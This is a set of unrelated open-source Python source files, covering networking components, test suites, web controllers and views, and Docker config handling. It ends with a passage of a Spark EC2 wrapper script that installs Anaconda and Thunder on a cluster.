if isinstance(message, removeReader):
selectable = message.object
self.removeLinks(selectable, meta[READERS], readers)
if isinstance(message, removeWriter):
selectable = message.object
self.removeLinks(selectable, meta[WRITERS], writers)
if isinstance(message, removeExceptional):
selectable = message.object
self.removeLinks(selectable, meta[EXCEPTIONALS], exceptionals)
def main(self):
"""Main loop"""
global timeout
readers,writers, exceptionals = [],[], []
if self.notifySocket:
readers.append(self.notifySocket)
selections = [readers,writers, exceptionals]
meta = [ {}, {}, {} ]
if not self.anyReady():
self.sync() # momentary pause-ish thing
last = 0
numberOfFailedSelectsDueToBadFileDescriptor = 0
shuttingDown = False
while 1: # SmokeTests_Selector.test_RunsForever
if self.dataReady("control"):
message = self.recv("control")
if isinstance(message,shutdown):
# print "recieved shutdown message"
shutdownStart = time.time()
timeWithNooneUsing = 0
shuttingDown = True
if shuttingDown:
# print "we're shutting down"
if len(readers) + len(writers) + len(exceptionals) <= self.minSelectables: # always have at least teh wakeup socket
if timeWithNooneUsing == 0:
# print "starting timeout"
timeWithNooneUsing = time.time()
else:
if time.time() - timeWithNooneUsing > timeout:
# print "Yay, timed out!"
break # exit the loop
else:
timeWithNooneUsing == 0 # reset this to zero if readers/writers/excepts goes up again...
# else:
# print "But someone is still using us...."
# print readers, writers, exceptionals
self.handleNotify(meta, readers,writers, exceptionals)
if len(readers) + len(writers) + len(exceptionals) > 0:
# print len(readers),len(writers),len(exceptionals)
try:
read_write_except = select.select(readers, writers, exceptionals,5) #0.05
numberOfFailedSelectsDueToBadFileDescriptor = 0
for i in xrange(3):
for selectable in read_write_except[i]:
try:
replyService, outbox, linkage = meta[i][selectable]
self.send(selectable, outbox)
replyService, outbox, linkage = None, None, None
# Note we remove the selectable until we know the reason for it being here has cleared.
self.removeLinks(selectable, meta[i], selections[i])
except KeyError, k:
# must be the wakeup signal, don't remove it or act on it
selectable.recv(1024)
except ValueError, e:
if FAILHARD:
raise e
except socket.error, e:
if e[0] == 9:
numberOfFailedSelectsDueToBadFileDescriptor +=1
if numberOfFailedSelectsDueToBadFileDescriptor > 1000:
# For the moment, we simply raise an exception.
# We could brute force our way through the list of descriptors
# to find the broken ones, and remove
raise e
self.sync()
elif not self.anyReady():
self.pause() # momentary pause-ish thing
# else:
# print "HMM"
## print "SELECTOR HAS EXITTED"
class Selector(component):
Inboxes = {
"control" : "Recieving a Axon.Ipc.shutdown() message here causes shutdown",
"inbox" : "Not used at present",
"notify" : "Used to be notified about things to select",
"_sink" : "For dummy notifications from selector",
}
Outboxes = {
"outbox" : "",
"signal" : "",
"_toNotify" : "Forwarding of messages to notify inbox of actual selector",
"_toControl" : "Forwarding of messages to control inbox of actual selector",
}
def __init__(self):
super(Selector, self).__init__()
self.trackedby = None
def trackedBy(self, tracker):
self.trackedby = tracker
def main(self):
self.notifySocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.notifySocket.setblocking(False)
self.notifySocket.bind(("127.0.0.1",1678))
self.notifySocket.connect(("127.0.0.1",1678))
self.selector = _SelectorCore(self.notifySocket)
self.addChildren(self.selector)
self.selector.activate()
self.link((self,"_toNotify"),(self.selector, "notify"))
self.link((self,"_toControl"),(self.selector, "control"))
# self.send( newReader( (self,"_sink"), self.notifySocket), "_toNotify")
shutdownMessage = shutdown()
while not self.childrenDone():
if not self.anyReady():
self.pause()
yield 1
wakeSelector=False
while self.dataReady("notify"):
message=self.recv("notify")
self.send(message, "_toNotify")
wakeSelector=True
while self.dataReady("control"):
message = self.recv("control")
if isinstance(message,shutdown):
if self.trackedby is not None:
# print "we are indeed tracked"
self.trackedby.deRegisterService("selector")
self.trackedby.deRegisterService("selectorshutdown")
self.send(message, "_toControl")
shutdownMessage=message
wakeSelector=True
if wakeSelector:
self.notifySocket.send("X")
self.send(shutdownMessage, "signal")
def childrenDone(self):
"""Unplugs any children that have terminated, and returns true if there are no
running child components left (ie. their microproceses have finished)
"""
for child in self.childComponents():
if child._isStopped():
self.removeChild(child) # deregisters linkages for us
return 0==len(self.childComponents())
def setSelectorServices(selector, tracker = None):
"""\
Sets the given selector as the service for the selected tracker or the
default one.
(static method)
"""
if not tracker:
tracker = cat.coordinatingassistanttracker.getcat()
tracker.registerService("selector", selector, "notify")
tracker.registerService("selectorshutdown", selector, "control")
selector.trackedBy(tracker)
setSelectorServices = staticmethod(setSelectorServices)
def getSelectorServices(tracker=None): # STATIC METHOD
"""\
Returns any live selector registered with the specified (or default) tracker,
or creates one for the system to use.
(static method)
"""
if tracker is None:
tracker = cat.coordinatingassistanttracker.getcat()
try:
service = tracker.retrieveService("selector")
shutdownservice = tracker.retrieveService("selectorshutdown")
return service, shutdownservice, None
except KeyError:
selector = Selector()
Selector.setSelectorServices(selector, tracker)
service=(selector,"notify")
shutdownservice=(selector,"control")
return service, shutdownservice, selector
getSelectorServices = staticmethod(getSelectorServices)
__kamaelia_components__ = ( Selector, )
|
sparkslabs/kamaelia_
|
Sketches/MH/RTP/Selector.py
|
Python
|
apache-2.0
| 16,564
|
import json
import sys
import ethereum.testutils as testutils
from ethereum.slogging import get_logger, configure_logging
logger = get_logger()
# customize VM log output to your needs
# hint: use 'py.test' with the '-s' option to dump logs to the console
if '--trace' in sys.argv: # not default
configure_logging(':trace')
sys.argv.remove('trace')
def test_vm(filename, testname, testdata):
testutils.check_vm_test(testutils.fixture_to_bytes(testdata))
def pytest_generate_tests(metafunc):
testutils.generate_test_params('VMTests', metafunc)
def main():
if len(sys.argv) == 1:
# read fixture from stdin
fixtures = {'stdin': json.load(sys.stdin)}
else:
# load fixtures from specified file or dir
try:
fixtures = testutils.get_tests_from_file_or_dir(sys.argv[1])
except:
fixtures = {'stdin': json.loads(sys.argv[1])}
for filename, tests in list(fixtures.items()):
for testname, testdata in list(tests.items()):
if len(sys.argv) < 3 or testname == sys.argv[2]:
print("Testing: %s %s" % (filename, testname))
testutils.check_vm_test(testdata)
if __name__ == '__main__':
main()
|
EthereumWebhooks/blockhooks
|
lib/ethereum/tests/test_vm.py
|
Python
|
apache-2.0
| 1,230
|
from keystone import utils
from keystone.common import wsgi
from keystone.logic.types.service import Service
import keystone.config as config
from . import get_marker_limit_and_url
class ServicesController(wsgi.Controller):
"""Controller for Service related operations"""
def __init__(self, options):
self.options = options
@utils.wrap_error
def create_service(self, req):
service = utils.get_normalized_request_content(Service, req)
return utils.send_result(201, req,
config.SERVICE.create_service(utils.get_auth_token(req), service))
@utils.wrap_error
def get_services(self, req):
marker, limit, url = get_marker_limit_and_url(req)
services = config.SERVICE.get_services(
utils.get_auth_token(req), marker, limit, url)
return utils.send_result(200, req, services)
@utils.wrap_error
def get_service(self, req, service_id):
service = config.SERVICE.get_service(
utils.get_auth_token(req), service_id)
return utils.send_result(200, req, service)
@utils.wrap_error
def delete_service(self, req, service_id):
rval = config.SERVICE.delete_service(utils.get_auth_token(req),
service_id)
return utils.send_result(204, req, rval)
|
ntt-pf-lab/backup_keystone
|
keystone/controllers/services.py
|
Python
|
apache-2.0
| 1,298
|
import json
import logging
import os
from ..constants import IS_WINDOWS_PLATFORM
DOCKER_CONFIG_FILENAME = os.path.join('.docker', 'config.json')
LEGACY_DOCKER_CONFIG_FILENAME = '.dockercfg'
log = logging.getLogger(__name__)
def find_config_file(config_path=None):
paths = list(filter(None, [
config_path, # 1
config_path_from_environment(), # 2
os.path.join(home_dir(), DOCKER_CONFIG_FILENAME), # 3
os.path.join(home_dir(), LEGACY_DOCKER_CONFIG_FILENAME), # 4
]))
log.debug(f"Trying paths: {repr(paths)}")
for path in paths:
if os.path.exists(path):
log.debug(f"Found file at path: {path}")
return path
log.debug("No config file found")
return None
def config_path_from_environment():
config_dir = os.environ.get('DOCKER_CONFIG')
if not config_dir:
return None
return os.path.join(config_dir, os.path.basename(DOCKER_CONFIG_FILENAME))
def home_dir():
"""
Get the user's home directory, using the same logic as the Docker Engine
client - use %USERPROFILE% on Windows, $HOME/getuid on POSIX.
"""
if IS_WINDOWS_PLATFORM:
return os.environ.get('USERPROFILE', '')
else:
return os.path.expanduser('~')
def load_general_config(config_path=None):
config_file = find_config_file(config_path)
if not config_file:
return {}
try:
with open(config_file) as f:
return json.load(f)
except (OSError, ValueError) as e:
# In the case of a legacy `.dockercfg` file, we won't
# be able to load any JSON data.
log.debug(e)
log.debug("All parsing attempts failed - returning empty config")
return {}
|
vdemeester/docker-py
|
docker/utils/config.py
|
Python
|
apache-2.0
| 1,724
|
from django.shortcuts import render
from django.core import serializers
import json
import datetime
import os
from django.http import HttpResponse
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.conf import settings
from publisher.models import Publication
from registrar.models import PeerReview
from publisher.forms import PublicationForm
@login_required(login_url='/landpage')
def my_publications_page(request):
try:
publications = Publication.objects.filter(author=request.user)
except Publication.DoesNotExist:
publications = None
return render(request, 'publisher/my_publication/view.html',{
'publications': publications,
'user': request.user,
'tab': 'my_publications',
'HAS_ADVERTISMENT': settings.APPLICATION_HAS_ADVERTISMENT,
'local_css_urls': settings.SB_ADMIN_2_CSS_LIBRARY_URLS,
'local_js_urls': settings.SB_ADMIN_2_JS_LIBRARY_URLS
})
@login_required()
def refresh_publications_table(request):
try:
publications = Publication.objects.filter(author=request.user)
except Publication.DoesNotExist:
publications = None
return render(request, 'publisher/my_publication/table.html',{
'publications': publications,
'user': request.user,
'tab': 'my_publications',
'local_css_urls': settings.SB_ADMIN_2_CSS_LIBRARY_URLS,
'local_js_urls': settings.SB_ADMIN_2_JS_LIBRARY_URLS
})
@login_required()
def my_publication_modal(request):
if request.method == u'POST':
form = None
publication_id = int(request.POST['publication_id'])
if publication_id > 0:
upload = Publication.objects.get(publication_id=publication_id)
form = PublicationForm(instance=upload)
else:
form = PublicationForm()
return render(request, 'publisher/my_publication/modal.html',{
'form': form,
})
@login_required()
def save_publication(request):
response_data = {'status' : 'failed', 'message' : 'unknown error with saving'}
if request.is_ajax():
if request.method == 'POST':
publication_id = int(request.POST['publication_id'])
form = PublicationForm(request.POST, request.FILES)
# If publication already exists, then delete local file.
if publication_id > 0:
# Delete previous file.
try:
upload = Publication.objects.get(publication_id=publication_id)
except Publication.DoesNotExist:
return HttpResponse(json.dumps({
'status' : 'failed', 'message' : 'record does not exist'
}), content_type="application/json")
if upload.file:
if os.path.isfile(upload.file.path):
os.remove(upload.file.path)
upload.file = None
upload.save()
form.instance = upload
# Save if valid
form.instance.author = request.user
if form.is_valid():
form.save()
response_data = {'status' : 'success', 'message' : 'saved'}
else:
response_data = {'status' : 'failed', 'message' : json.dumps(form.errors)}
return HttpResponse(json.dumps(response_data), content_type="application/json")
@login_required()
def delete_publication(request):
response_data = {'status' : 'failed', 'message' : 'unknown error with deleting'}
if request.is_ajax():
if request.method == 'POST':
publication_id = int(request.POST['publication_id'])
try:
publication = Publication.objects.get(publication_id=publication_id)
for peer_review in publication.reviews.all():
peer_review.delete()
publication.delete()
response_data = {'status' : 'success', 'message' : 'deleted'}
except Publication.DoesNotExist:
response_data = {'status' : 'failed', 'message' : 'record not found'}
return HttpResponse(json.dumps(response_data), content_type="application/json")
|
AcademicsToday/py-academicstoday
|
academicstoday_project/publisher/views/my_publication.py
|
Python
|
apache-2.0
| 4,339
|
"""The tests the for Locative device tracker platform."""
from unittest.mock import Mock, patch
import pytest
from homeassistant import data_entry_flow
from homeassistant.components import locative
from homeassistant.components.device_tracker import DOMAIN as DEVICE_TRACKER_DOMAIN
from homeassistant.components.locative import DOMAIN, TRACKER_UPDATE
from homeassistant.const import HTTP_OK, HTTP_UNPROCESSABLE_ENTITY
from homeassistant.helpers.dispatcher import DATA_DISPATCHER
from homeassistant.setup import async_setup_component
# pylint: disable=redefined-outer-name
@pytest.fixture(autouse=True)
def mock_dev_track(mock_device_tracker_conf):
"""Mock device tracker config loading."""
pass
@pytest.fixture
async def locative_client(loop, hass, hass_client):
"""Locative mock client."""
assert await async_setup_component(hass, DOMAIN, {DOMAIN: {}})
await hass.async_block_till_done()
with patch("homeassistant.components.device_tracker.legacy.update_config"):
return await hass_client()
@pytest.fixture
async def webhook_id(hass, locative_client):
"""Initialize the Geofency component and get the webhook_id."""
hass.config.api = Mock(base_url="http://example.com")
result = await hass.config_entries.flow.async_init(
"locative", context={"source": "user"}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM, result
result = await hass.config_entries.flow.async_configure(result["flow_id"], {})
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
await hass.async_block_till_done()
return result["result"].data["webhook_id"]
async def test_missing_data(locative_client, webhook_id):
"""Test missing data."""
url = "/api/webhook/{}".format(webhook_id)
data = {
"latitude": 1.0,
"longitude": 1.1,
"device": "123",
"id": "Home",
"trigger": "enter",
}
# No data
req = await locative_client.post(url)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
# No latitude
copy = data.copy()
del copy["latitude"]
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
# No device
copy = data.copy()
del copy["device"]
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
# No location
copy = data.copy()
del copy["id"]
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
# No trigger
copy = data.copy()
del copy["trigger"]
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
# Test message
copy = data.copy()
copy["trigger"] = "test"
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_OK
# Test message, no location
copy = data.copy()
copy["trigger"] = "test"
del copy["id"]
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_OK
# Unknown trigger
copy = data.copy()
copy["trigger"] = "foobar"
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
async def test_enter_and_exit(hass, locative_client, webhook_id):
"""Test when there is a known zone."""
url = "/api/webhook/{}".format(webhook_id)
data = {
"latitude": 40.7855,
"longitude": -111.7367,
"device": "123",
"id": "Home",
"trigger": "enter",
}
# Enter the Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state_name = hass.states.get(
"{}.{}".format(DEVICE_TRACKER_DOMAIN, data["device"])
).state
assert state_name == "home"
data["id"] = "HOME"
data["trigger"] = "exit"
# Exit Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state_name = hass.states.get(
"{}.{}".format(DEVICE_TRACKER_DOMAIN, data["device"])
).state
assert state_name == "not_home"
data["id"] = "hOmE"
data["trigger"] = "enter"
# Enter Home again
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state_name = hass.states.get(
"{}.{}".format(DEVICE_TRACKER_DOMAIN, data["device"])
).state
assert state_name == "home"
data["trigger"] = "exit"
# Exit Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state_name = hass.states.get(
"{}.{}".format(DEVICE_TRACKER_DOMAIN, data["device"])
).state
assert state_name == "not_home"
data["id"] = "work"
data["trigger"] = "enter"
# Enter Work
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state_name = hass.states.get(
"{}.{}".format(DEVICE_TRACKER_DOMAIN, data["device"])
).state
assert state_name == "work"
async def test_exit_after_enter(hass, locative_client, webhook_id):
"""Test when an exit message comes after an enter message."""
url = "/api/webhook/{}".format(webhook_id)
data = {
"latitude": 40.7855,
"longitude": -111.7367,
"device": "123",
"id": "Home",
"trigger": "enter",
}
# Enter Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get("{}.{}".format(DEVICE_TRACKER_DOMAIN, data["device"]))
assert state.state == "home"
data["id"] = "Work"
# Enter Work
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get("{}.{}".format(DEVICE_TRACKER_DOMAIN, data["device"]))
assert state.state == "work"
data["id"] = "Home"
data["trigger"] = "exit"
# Exit Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get("{}.{}".format(DEVICE_TRACKER_DOMAIN, data["device"]))
assert state.state == "work"
async def test_exit_first(hass, locative_client, webhook_id):
"""Test when an exit message is sent first on a new device."""
url = "/api/webhook/{}".format(webhook_id)
data = {
"latitude": 40.7855,
"longitude": -111.7367,
"device": "new_device",
"id": "Home",
"trigger": "exit",
}
# Exit Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get("{}.{}".format(DEVICE_TRACKER_DOMAIN, data["device"]))
assert state.state == "not_home"
async def test_two_devices(hass, locative_client, webhook_id):
"""Test updating two different devices."""
url = "/api/webhook/{}".format(webhook_id)
data_device_1 = {
"latitude": 40.7855,
"longitude": -111.7367,
"device": "device_1",
"id": "Home",
"trigger": "exit",
}
# Exit Home
req = await locative_client.post(url, data=data_device_1)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get(
"{}.{}".format(DEVICE_TRACKER_DOMAIN, data_device_1["device"])
)
assert state.state == "not_home"
# Enter Home
data_device_2 = dict(data_device_1)
data_device_2["device"] = "device_2"
data_device_2["trigger"] = "enter"
req = await locative_client.post(url, data=data_device_2)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get(
"{}.{}".format(DEVICE_TRACKER_DOMAIN, data_device_2["device"])
)
assert state.state == "home"
state = hass.states.get(
"{}.{}".format(DEVICE_TRACKER_DOMAIN, data_device_1["device"])
)
assert state.state == "not_home"
@pytest.mark.xfail(
reason="The device_tracker component does not support unloading yet."
)
async def test_load_unload_entry(hass, locative_client, webhook_id):
"""Test that the appropriate dispatch signals are added and removed."""
url = "/api/webhook/{}".format(webhook_id)
data = {
"latitude": 40.7855,
"longitude": -111.7367,
"device": "new_device",
"id": "Home",
"trigger": "exit",
}
# Exit Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get("{}.{}".format(DEVICE_TRACKER_DOMAIN, data["device"]))
assert state.state == "not_home"
assert len(hass.data[DATA_DISPATCHER][TRACKER_UPDATE]) == 1
entry = hass.config_entries.async_entries(DOMAIN)[0]
await locative.async_unload_entry(hass, entry)
await hass.async_block_till_done()
assert not hass.data[DATA_DISPATCHER][TRACKER_UPDATE]
|
leppa/home-assistant
|
tests/components/locative/test_init.py
|
Python
|
apache-2.0
| 9,135
|
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class autoscalepolicy_nstimer_binding(base_resource) :
""" Binding class showing the nstimer that can be bound to autoscalepolicy.
"""
def __init__(self) :
self._boundto = ""
self._priority = 0
self._activepolicy = 0
self._gotopriorityexpression = ""
self._name = ""
self.___count = 0
@property
def name(self) :
ur"""The name of the autoscale policy.<br/>Minimum length = 1.
"""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
ur"""The name of the autoscale policy.<br/>Minimum length = 1
"""
try :
self._name = name
except Exception as e:
raise e
@property
def boundto(self) :
ur"""Location where policy is bound.
"""
try :
return self._boundto
except Exception as e:
raise e
@boundto.setter
def boundto(self, boundto) :
ur"""Location where policy is bound.
"""
try :
self._boundto = boundto
except Exception as e:
raise e
@property
def priority(self) :
ur"""Specifies the priority of the policy.
"""
try :
return self._priority
except Exception as e:
raise e
@property
def gotopriorityexpression(self) :
ur"""Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.
"""
try :
return self._gotopriorityexpression
except Exception as e:
raise e
@property
def activepolicy(self) :
ur"""Indicates whether policy is bound or not.
"""
try :
return self._activepolicy
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
ur""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(autoscalepolicy_nstimer_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.autoscalepolicy_nstimer_binding
except Exception as e :
raise e
def _get_object_name(self) :
ur""" Returns the value of object identifier argument
"""
try :
if self.name is not None :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def get(cls, service, name) :
ur""" Use this API to fetch autoscalepolicy_nstimer_binding resources.
"""
try :
obj = autoscalepolicy_nstimer_binding()
obj.name = name
response = obj.get_resources(service)
return response
except Exception as e:
raise e
@classmethod
def get_filtered(cls, service, name, filter_) :
ur""" Use this API to fetch filtered set of autoscalepolicy_nstimer_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = autoscalepolicy_nstimer_binding()
obj.name = name
option_ = options()
option_.filter = filter_
response = obj.getfiltered(service, option_)
return response
except Exception as e:
raise e
@classmethod
def count(cls, service, name) :
ur""" Use this API to count autoscalepolicy_nstimer_binding resources configued on NetScaler.
"""
try :
obj = autoscalepolicy_nstimer_binding()
obj.name = name
option_ = options()
option_.count = True
response = obj.get_resources(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
@classmethod
def count_filtered(cls, service, name, filter_) :
ur""" Use this API to count the filtered set of autoscalepolicy_nstimer_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = autoscalepolicy_nstimer_binding()
obj.name = name
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
class autoscalepolicy_nstimer_binding_response(base_response) :
def __init__(self, length=1) :
self.autoscalepolicy_nstimer_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.autoscalepolicy_nstimer_binding = [autoscalepolicy_nstimer_binding() for _ in range(length)]
|
benfinke/ns_python
|
nssrc/com/citrix/netscaler/nitro/resource/config/autoscale/autoscalepolicy_nstimer_binding.py
|
Python
|
apache-2.0
| 5,544
|
#!/usr/bin/env python
"""
Wrapper for the Spark EC2 launch script that additionally
installs Anaconda, Thunder, and its dependencies, and optionally
loads example data sets
"""
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Modified from Spark's spark_ec2.py under the terms of the ASF 2.0 license.
from boto import ec2
import sys
import os
import random
import subprocess
import time
from termcolor import colored
from distutils.version import LooseVersion
from sys import stderr
from optparse import OptionParser
from spark_ec2 import launch_cluster, get_existing_cluster, stringify_command,\
deploy_files, get_spark_ami, ssh_read, ssh_write
try:
from spark_ec2 import wait_for_cluster
except ImportError:
from spark_ec2 import wait_for_cluster_state
from thunder import __version__ as THUNDER_VERSION
MINIMUM_SPARK_VERSION = "1.1.0"
EXTRA_SSH_OPTS = ['-o', 'UserKnownHostsFile=/dev/null',
'-o', 'CheckHostIP=no',
'-o', 'LogLevel=quiet']
def print_status(msg):
print(" [" + msg + "]")
def print_success(msg="success"):
print(" [" + colored(msg, 'green') + "]")
def print_error(msg="failed"):
print(" [" + colored(msg, 'red') + "]")
class quiet(object):
""" Minmize stdout and stderr from external processes """
def __init__(self):
self.null_fds = [os.open(os.devnull, os.O_RDWR) for x in range(2)]
self.save_fds = (os.dup(1), os.dup(2))
def __enter__(self):
os.dup2(self.null_fds[0], 1)
os.dup2(self.null_fds[1], 2)
def __exit__(self, *_):
os.dup2(self.save_fds[0], 1)
os.dup2(self.save_fds[1], 2)
os.close(self.null_fds[0])
os.close(self.null_fds[1])
def get_s3_keys():
""" Get user S3 keys from environmental variables """
if os.getenv('S3_AWS_ACCESS_KEY_ID') is not None:
s3_access_key = os.getenv("S3_AWS_ACCESS_KEY_ID")
else:
s3_access_key = os.getenv("AWS_ACCESS_KEY_ID")
if os.getenv('S3_AWS_SECRET_ACCESS_KEY') is not None:
s3_secret_key = os.getenv("S3_AWS_SECRET_ACCESS_KEY")
else:
s3_secret_key = os.getenv("AWS_SECRET_ACCESS_KEY")
return s3_access_key, s3_secret_key
def get_default_thunder_version():
"""
Returns 'HEAD' (current state of thunder master branch) if thunder is a dev version, otherwise
return the current thunder version.
"""
if ".dev" in THUNDER_VERSION:
return 'HEAD'
return THUNDER_VERSION
def get_spark_version_string(default_version):
"""
Parses out the Spark version string from $SPARK_HOME/RELEASE, if present, or from pom.xml if not
Returns version string from either of the above sources, or default_version if nothing else works
"""
SPARK_HOME = os.getenv("SPARK_HOME")
if SPARK_HOME is None:
raise Exception('must assign the environmental variable SPARK_HOME with the location of Spark')
if os.path.isfile(os.path.join(SPARK_HOME, "RELEASE")):
with open(os.path.join(SPARK_HOME, "RELEASE")) as f:
line = f.read()
# some nasty ad-hoc parsing here. we expect a string of the form
# "Spark VERSION built for hadoop HADOOP_VERSION"
# where VERSION is a dotted version string.
# for now, simply check that there are at least two tokens and the second token contains a period.
tokens = line.split()
if len(tokens) >= 2 and '.' in tokens[1]:
return tokens[1]
# if we get to this point, we've failed to parse out a version string from the RELEASE file. note that
# there will not be a RELEASE file for versions of Spark built from source. in this case we'll try to
# get it out from the pom file.
import xml.etree.ElementTree as ET
try:
root = ET.parse(os.path.join(SPARK_HOME, "pom.xml"))
version_elt = root.find("./{http://maven.apache.org/POM/4.0.0}version")
if version_elt is not None:
return version_elt.text
except IOError:
# no pom file; fall through and return default
pass
return default_version
SPARK_VERSIONS_TO_HASHES = {
'1.2.0rc2': "a428c446e23e"
}
def setup_spark_cluster(master, opts):
ssh(master, opts, "chmod u+x spark-ec2/setup.sh")
ssh(master, opts, "spark-ec2/setup.sh")
def remap_spark_version_to_hash(user_version_string):
"""
Replaces a user-specified Spark version string with a github hash if needed.
Used to allow clusters to be deployed with Spark release candidates.
"""
return SPARK_VERSIONS_TO_HASHES.get(user_version_string, user_version_string)
def install_anaconda(master, opts):
""" Install Anaconda on a Spark EC2 cluster """
# download anaconda
print_status("Downloading Anaconda")
ssh(master, opts, "wget http://09c8d0b2229f813c1b93-c95ac804525aac4b6dba79b00b39d1d3.r79.cf1.rackcdn.com/"
"Anaconda-2.1.0-Linux-x86_64.sh")
print_success()
# setup anaconda
print_status("Installing Anaconda")
ssh(master, opts, "rm -rf /root/anaconda && bash Anaconda-2.1.0-Linux-x86_64.sh -b "
"&& rm Anaconda-2.1.0-Linux-x86_64.sh")
ssh(master, opts, "echo 'export PATH=/root/anaconda/bin:$PATH:/root/spark/bin' >> /root/.bash_profile")
ssh(master, opts, "pssh -h /root/spark-ec2/slaves 'echo 'export "
"PATH=/root/anaconda/bin:$PATH:/root/spark/bin' >> /root/.bash_profile'")
ssh(master, opts, "echo 'export PYSPARK_PYTHON=/root/anaconda/bin/python' >> /root/.bash_profile")
ssh(master, opts, "pssh -h /root/spark-ec2/slaves 'echo 'export "
"PYSPARK_PYTHON=/root/anaconda/bin/python' >> /root/.bash_profile'")
print_success()
# update core libraries
print_status("Updating Anaconda libraries")
ssh(master, opts, "/root/anaconda/bin/conda update --yes numpy scipy ipython")
ssh(master, opts, "/root/anaconda/bin/conda install --yes jsonschema pillow seaborn scikit-learn")
print_success()
# add mistune (for notebook conversions)
ssh(master, opts, "source ~/.bash_profile && pip install mistune")
# copy to slaves
print_status("Copying Anaconda to workers")
ssh(master, opts, "/root/spark-ec2/copy-dir /root/anaconda")
print_success()
def install_thunder(master, opts):
""" Install Thunder and dependencies on a Spark EC2 cluster """
print_status("Installing Thunder")
# download thunder
ssh(master, opts, "rm -rf thunder && git clone https://github.com/freeman-lab/thunder.git")
if opts.thunder_version.lower() != "head":
tagOrHash = opts.thunder_version
if '.' in tagOrHash and not (tagOrHash.startswith('v')):
# we have something that looks like a version number. prepend 'v' to get a valid tag id.
tagOrHash = 'v' + tagOrHash
ssh(master, opts, "cd thunder && git checkout %s" % tagOrHash)
# copy local data examples to all workers
ssh(master, opts, "yum install -y pssh")
ssh(master, opts, "pssh -h /root/spark-ec2/slaves mkdir -p /root/thunder/thunder/utils/data/")
ssh(master, opts, "~/spark-ec2/copy-dir /root/thunder/thunder/utils/data/")
# install requirements
ssh(master, opts, "source ~/.bash_profile && pip install -r /root/thunder/requirements.txt")
ssh(master, opts, "pssh -h /root/spark-ec2/slaves 'source ~/.bash_profile && pip install zope.cachedescriptors'")
# set environmental variables
ssh(master, opts, "echo 'export SPARK_HOME=/root/spark' >> /root/.bash_profile")
ssh(master, opts, "echo 'export PYTHONPATH=/root/thunder' >> /root/.bash_profile")
ssh(master, opts, "echo 'export IPYTHON=1' >> /root/.bash_profile")
# build thunder
